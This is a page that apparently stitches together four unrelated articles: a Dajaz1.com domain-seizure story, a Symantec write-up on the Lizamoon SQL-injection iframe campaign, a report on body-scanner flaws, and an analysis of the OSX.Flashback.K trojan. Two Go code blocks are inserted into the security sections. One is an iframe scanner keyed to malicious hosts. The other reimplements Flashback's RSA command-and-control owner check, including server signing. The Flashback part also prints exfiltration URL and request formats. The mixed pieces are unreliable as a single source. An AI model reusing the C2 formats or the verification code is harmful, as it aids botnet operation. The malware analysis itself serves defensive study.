Seized Hip-Hop Site Lashes Out At Feds, RIAA

For more than a year, and without explanation, the government redirected hip-hop site Dajaz1.com to this landing page.

The hip-hop music site the authorities shuttered for more than a year without explanation has lashed out at the recording industry and the federal government, likening the taking of the site to a “digital Guantanamo.”

“Seizing a blog for linking to four songs, even allegedly infringing ones, is equivalent to seizing the printing press of The New York Times because the newspaper, in its concert calendar, refers readers to four concerts where the promoters of those concerts have failed to pay ASCAP for the performance licenses,” Andre Nasib, the site’s owner, wrote in a blog post Monday on the popular dajaz1.com site.

Nasib had originally declined comment when Wired disclosed the backstory of the seizure on Thursday.

According to court records obtained by Wired, federal authorities seized the dajaz1.com site based on assertions from the Recording Industry Association of America that it was linking to four “pre-release” music tracks in November, 2010. The authorities gave it back nearly 13 months later without filing civil or criminal charges because of apparent recording industry delays in confirming infringement, according to the court records, which were unsealed by the Electronic Frontier Foundation, the First Amendment Coalition and Wired.

The records illustrated a secret government process in which a judge granted the government repeated time extensions to build a civil or criminal case against dajaz1.com, one of about 750 domains the government has seized in the last two years in a program known as Operation in Our Sites.

Immigrations and Customs Enforcement, a branch of the Department of Homeland Security, has the power to seize web domains engaged in infringing activity under the same forfeiture laws used to seize property like houses, cars and boats allegedly tied to illegal activity such as drug running or gambling.

The authorities seized the site in November 2010 on the word of the RIAA that four songs linked to on the site were unauthorized, the records show. Yet nearly a year later, in September 2011, the government was secretly seeking its third time extension to build its case, largely because it was still waiting for the recording industry to produce evidence, the records show.

All the while, the site’s owner and his attorney were left out of the loop, as the court record was sealed from them and the public. The Dajaz1 site was redirected to a government landing page saying it was seized by customs officials.

The site claims the four songs by Jamie Foxx, Chris Brown, Nelly and Reek Da Villian at the center of the dispute were provided to it by the recording industry.

Federal prosecutors in Los Angeles, where the case was handled, have declined comment. The Recording Industry Association of America initially declined comment. In an e-mail to Wired late Sunday, however, the RIAA said it “made every attempt” to assist the investigation “in a complete and prompt manner.”

The RIAA has repeatedly attacked the site for allegedly facilitating wanton copyright infringement of pre-release music, saying dajaz1.com has released “thousands” of unauthorized songs.

Dajaz1 blasted back Monday, saying the “RIAA’s grand and sweeping attacks on dajaz1.com suggest that the RIAA’s powers of demonization far exceed its ability to substantiate its malicious statements with specific, credible facts.”

Lizamoon Mass SQL-Injection: Tried and Tested Formula

Analysis: Kevin Savage

Following on from our recent blog post on malicious Web injects affecting distribution of a malicious Android application, here is a more traditional type – but on a huge scale. Those of us in the security industry are well aware of a certain email address — [email protected] — which registers domains consistently used in mass SQL-injection attacks against vulnerable Web applications. This mass SQL-injection of a malicious iFrame was dubbed Lizamoon (as a result of the domain name used during similar attacks back in 2011).

Although the domains have changed, the technique remains the same: exploit vulnerable sites on a large scale with an SQL-injection attack, which will then direct users to websites containing malicious code. The current wave of injection is considerable, if we base this on the search results Google has indexed:

The IP address 31.210.100.242 has been identified in the attack and has four domains currently associated with it:

  • hgbyju.com
  • hnjhkm.com
  • nikjju.com
  • njukol.com

If you have visited a site with the injected iFrame, the following events will take place:

Infected site
[REDIRECTS] →
[hxxp]://njukol.com/r.php
[REDIRECTS] →
[hxxp]://www3.safe-defensefu.com/?f1hlu4a=[ENCODED DATA]
[REDIRECTS] →
[hxxp]://www1.powermb-security.it.cx/ntzjc62?vjgtl=[ENCODED DATA]
[REDIRECTS] →
[hxxp]://www1.powermb-security.it.cx/i.html
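As an added illustration (not Symantec's code), a small Go scanner that flags iframes whose source host is the attack IP or one of the four domains listed above; it is meant to be run over page HTML or over dumped database text columns that feed page output, and the sample row is constructed.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Indicators from the write-up: the attack IP and the four domains hosted on it.
var lizamoonHosts = map[string]bool{
	"31.210.100.242": true, "hgbyju.com": true, "hnjhkm.com": true,
	"nikjju.com": true, "njukol.com": true,
}

// iframeSrc matches an <iframe ...> tag and captures its src attribute value;
// the injected markup is usually appended as one line to a text column.
var iframeSrc = regexp.MustCompile(`(?is)<iframe[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)`)

// injectedIframes returns the src URL of every iframe in content whose host
// is a known Lizamoon host or a subdomain of one (matching is case-insensitive).
func injectedIframes(content string) []string {
	var hits []string
	for _, m := range iframeSrc.FindAllStringSubmatch(content, -1) {
		u, err := url.Parse(strings.ToLower(m[1]))
		if err != nil {
			continue
		}
		host := u.Hostname()
		for known := range lizamoonHosts {
			if host == known || strings.HasSuffix(host, "."+known) {
				hits = append(hits, m[1])
				break
			}
		}
	}
	return hits
}

func main() {
	// Constructed sample: a product description column with the injected iframe appended.
	row := `<p>Blue widget, 10 pcs</p><iframe src="http://njukol.com/r.php" width=1 height=1></iframe>`
	fmt.Println(injectedIframes(row))
}
```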

The i.html file serves up two exploits:

  1. CVE-2010-0188 – Trojan.Pidief

     If vulnerable, this exploit attempts to download and execute a file from a location which no longer resolves.

  2. CVE-2012-0507 – Trojan.Maljava

     If vulnerable, this exploit will successfully download and execute a Backdoor.Trojan from the following URL:

     [hxxp]://www2.smartqz-army.dnset.com

We are currently analyzing this file and will provide further updates once we’ve completed the analysis.

Protection

Symantec protects you against this attack with the following IPS signatures:

The exploits used in this attack are known vulnerabilities and already patched. Please ensure you apply the latest patches and have your antivirus up to date.

Homeland Security Concedes Airport Body Scanner ‘Vulnerabilities’

TSA is moving toward body scanners displaying generic human outlines. Photo: TSA

Federal investigators “identified vulnerabilities in the screening process” at domestic airports using so-called “full body scanners,” according to a classified internal Department of Homeland Security report.

DHS has spent nearly $90 million replacing traditional magnetometers with controversial X-ray body scanning machines that are intended to detect items that could be missed by a metal detector.

Exactly how bad the body scanners are is not being divulged publicly, but the Inspector General report made eight separate recommendations on how to improve screening.

The news comes as authorities are examining an underwear bomb, allegedly seized by the CIA in Yemen as it allegedly thwarted an Al-Qaida plot to destroy a U.S.-bound airplane, according to The Associated Press. Authorities are now looking to determine if the bomb could have passed through airport screeners without being detected.

Meanwhile, an unclassified version of the Inspector General report, unearthed Friday by the Electronic Information Privacy Center, may give credence to a recent YouTube video allegedly showing a 27-year-old Florida man sneaking a metallic object through two different Transportation Security Administration body scanners at American airports.

The TSA agreed with all of the Inspector General’s recommendations. The Inspector General did not immediately respond to a request for comment.

In March, meanwhile, a TSA spokeswoman said “These machines are safe” when asked to address a video by Jonathan Corbett, of Miami Beach, who allegedly had discovered a method to beat the body scanners, which number 600 and are in about 140 U.S. airports. A brief YouTube video allegedly shows Corbett, who had sewn a pocket to the side of his shirt, getting past two body scanners with a metallic object in that pocket.

It was not immediately known when the TSA published its unclassified summary, TSA Penetration Testing of Advanced Imaging Technology. It comes with a “November 2011” date and can be found on the DHS Office of Inspector General website under the heading “OIG Reports: Fiscal Year 2012.”

It’s not the first time the body scanners, produced by Rapiscan and L-3 Communications, have come under attack. In a three-part series last year, Wired reported that, indeed, there were suspected security flaws with them. Even the Government Accountability Office — Congress’ investigative arm — said the devices might be ineffective. And the Journal of Transportation Security suggested terrorists might fool the Rapiscan machines by taping explosive devices to their stomachs.

The unclassified summary said the government has spent $87 million on the scanners, which includes $10 million for “installation and maintenance.” To quiet privacy concerns, the authorities are also spending $7 million to “remove the human factor from the image review process” and replace the passenger’s image with an avatar.

The unclassified version said the “quantitative and qualitative results of our testing are classified.”

Passengers who refuse to go through the machines are subject to intense physical patdowns. Many have complained the process includes being sexually groped.

Amie Stepanovich, an EPIC attorney, said the group would file a Freedom of Information Act claim in a bid to get access to the full report. “This involves a program that is important to the public,” she said in a telephone interview.

EPIC had sued the government, claiming the machines were an unconstitutional breach of Americans’ privacy. A federal appeals court sided with the authorities, although the court said the government did not adhere to the law when it began implementing the machines at airports as early as 2007.

OSX.FlashBack.K – An Overview and its Inner Workings

In our previous blogs, [1], [2], [3], and [4], we described how a computer may become infected with OSX.Flashback.K and provided various statistics about infected computers. The purpose of this blog is to describe the inner workings of the threat.

The ultimate goal of the OSX.Flashback.K Trojan is to generate money through ad-clicking. The threat employs multiple components in order to achieve this goal. The image below illustrates the various stages involved once OSX.Flashback.K gets downloaded on to a user’s computer through a drive-by-download of the malicious JAR file.

Figure 1. Threat overview

The malicious JAR file exploits the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) in order to drop an embedded MachO-1 executable file onto the computer.

This initial dropped MachO binary file is a downloader component that contacts a server to download additional binary files.

The server that the downloader component contacts is generated by a Domain Name Generation algorithm (DGA-1)**. DGA-1 uses the current date along with hard-coded values to generate 30 domains per day using the following top-level domains (TLD)[3]:

  • .com
  • .in
  • .info
  • .kz
  • .net

The downloaded binary file contains two MachO binaries: a loader (MachO-2) and an ad-clicking payload (MachO-3). Both of the binaries are then decrypted and dropped on to the compromised computer. The MachO-2 binary file is installed in such a way that it is ultimately loaded as part of the Web browser. This is achieved by modifying either of the following property list files depending upon the privilege or permissions it has in the computer:

  • /Applications/Safari.app/Contents/Info.plist
  • ~/.MacOSX/environment.plist

Upon execution, the MachO-2 binary loads the MachO-3 binary and hooks the CFReadStreamRead() and CFWriteStreamWrite() APIs in order to intercept Web browser traffic for the purpose of injecting advertisements.

Figure 2. Hooking procedure by Loader (MachO-1)

The threat then monitors a user’s outgoing network data to see if the user either clicks on a search query or clicks on an advertisement, as shown in the following image.

Figure 3. Web browser traffic interception

The threat is interested in two types of action that the user may perform:

  1. Clicking on a Google Advertisement
  2. Performing a search in a search engine

The threat attempts to identify any of the following parameters:

  • GET /url?
  • google
  • q=
  • sa=
  • ved=
  • usg=

Each of these is typically found when a user clicks on a Google advertisement. If none of the domains from its whitelist are present in the query, then the threat gathers the parameters from the query, encodes them using base64, and sends the information to a command-and-control (C&C) server in the following form:

hxxp://[VERIFIED-C&C-SERVER]/click?data=[BASE64 CLICK PARAMETERS]

If the threat determines that the query is part of a regular Google search, it obtains the search query and sends it to the C&C server in the following form [4]:

hxxp://[VERIFIED C&C SERVER]/search?q=[BASE64 QUERY]&ua=[BASE64 USER AGENT]&al=[BASE64 ACCEPTED LANGUAGE]&cv=[CLIENT VERSION]

The "User-Agent:" of the HTTP header in the above request contains the Base64-encoded PlatformUUID of the user’s computer. This is used so the attacker can verify that the request is from a legitimate compromised computer and so the attacker can also encrypt the response using the PlatformUUID.

The “verified C&C server” responds to this query with the ad-clicking URLs that will be injected into the user’s browser by using the hooked CFReadStreamRead() API code in the MachO-3 binary. By doing this, the user sees search results in response to their search query, but the search results are now from pay-per-click services the OSX.Flashback.K author has signed up for.

By replacing search results in the manner shown above, the malware author receives money for every click performed by the user.

Verification of the C&C server

Since it is common for malware C&C servers to be taken down or hijacked by antivirus companies and law enforcement, the OSX.Flashback authors have incorporated an owner verification scheme into the threat.

For owner verification, the threat sends a query to all of the domains from the generated domain list (discussed later) in the following form:

GET /owncheck/ HTTP/1.1
Host: [C&C SERVER DOMAIN]
User-Agent: BASE64[PLATFORM UUID]
Connection: close

In response, the malicious server sends two parts of the data in the following form:

BASE64[Sha1([SERVER DOMAIN])]|BASE64[RSA SIGNATURE]

The first part is the sha1() value of the server domain and the second part is the RSA signature that is signed over the first part using an RSA private key. This procedure authenticates that the Flashback authors have control over the queried domain as they own the RSA private key.
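The owner-verification exchange described above, as an added Go example that is neither Flashback's nor Symantec's code: one function builds the two-part reply a server under the authors' control would send, the other is the bot-side check that rejects a reply from a sinkhole that registered the domain but lacks the private key. The keys and domain names are generated or constructed here, and PKCS#1 v1.5 over the SHA-1 digest is an assumption, since the page does not name the signature scheme.

```go
package main

import (
	"bytes"
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha1"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// ownCheckResponse builds the /owncheck/ reply in the page's format:
// BASE64[sha1(domain)] "|" BASE64[RSA signature over that sha1 value].
func ownCheckResponse(priv *rsa.PrivateKey, domain string) (string, error) {
	digest := sha1.Sum([]byte(domain))
	sig, err := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA1, digest[:]) // scheme assumed
	if err != nil {
		return "", err
	}
	enc := base64.StdEncoding
	return enc.EncodeToString(digest[:]) + "|" + enc.EncodeToString(sig), nil
}

// verifyOwnCheck is the bot-side check: the digest must be sha1 of the domain
// actually queried and the signature must validate under the embedded public key.
func verifyOwnCheck(pub *rsa.PublicKey, domain, response string) error {
	first, second, ok := strings.Cut(response, "|")
	digest, err1 := base64.StdEncoding.DecodeString(first)
	sig, err2 := base64.StdEncoding.DecodeString(second)
	want := sha1.Sum([]byte(domain))
	if !ok || err1 != nil || err2 != nil || !bytes.Equal(digest, want[:]) {
		return errors.New("malformed reply or digest is not sha1 of the queried domain")
	}
	return rsa.VerifyPKCS1v15(pub, crypto.SHA1, digest, sig)
}

// demo plays three exchanges against the authors' public key: a genuine reply, that
// same reply replayed for another domain, and a reply from a sinkhole holding its own key.
func demo() (genuine, replayed, sinkhole error) {
	authors, _ := rsa.GenerateKey(rand.Reader, 2048)  // stands in for the authors' key pair
	imposter, _ := rsa.GenerateKey(rand.Reader, 2048) // a sinkhole that registered the domain
	pub := &authors.PublicKey
	good, _ := ownCheckResponse(authors, "abc.example") // constructed DGA-style names
	fake, _ := ownCheckResponse(imposter, "abc.example")
	return verifyOwnCheck(pub, "abc.example", good), verifyOwnCheck(pub, "xyz.example", good), verifyOwnCheck(pub, "abc.example", fake)
}

func main() { fmt.Println(demo()) }
```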

Once verified, the threat checks for an update to the threat with the following query:

GET /auupdate/ HTTP/1.1
Host: [Verified C&C SERVER DOMAIN]
User-Agent: BASE64[COMPROMISED COMPUTER INFORMATION]
Connection: close

Note: [COMPROMISED COMPUTER INFORMATION] from above is of the form shown below.

Figure 4. [COMPROMISED COMPUTER INFORMATION] format

This is how a new version of the threat is delivered by the attacker.

Twitter hashtag search and Domain Generation Algorithm (DGA-2)

Apart from its hard-coded list of C&C servers, the threat can update its C&C server address in one of the following two ways:

  1. Through a C&C server address obtained from a specific Twitter message having a specific hashtag in it. This Twitter message is found by a Twitter search, querying for specific hashtags. These hashtags are generated from the current date, by using its values (day, month, year) as indexes into a list of 34 predefined four-letter strings, forming a 12-character hashtag.

  2. Through a C&C server generated using a Domain Generation Algorithm (DGA-2) based on the current date, by using its values (day, month, year) as indexes into a list of 34 predefined four-letter strings, forming a 12-character domain string and combining it with the 26 predefined top-level domains shown below.

Figure 5. 26 pre-defined top-level domains

Although the final motive behind all of this is to serve advertisements through pay-per-click services and to generate money, the use of techniques like Domain Generation Algorithm and public key cryptography demonstrates that the author is well-versed in the creation of malware.

Perhaps this experience comes from previous malware authoring in other operating systems?

As always, please keep your antivirus and other installed software up to date while we continue to monitor the threat landscape for more to come.

**We have seen two types of dropped MachO-1 downloader: one with a hard-coded server address to contact and another with a Domain Generation Algorithm (DGA-1) embedded within. This post discusses the latter.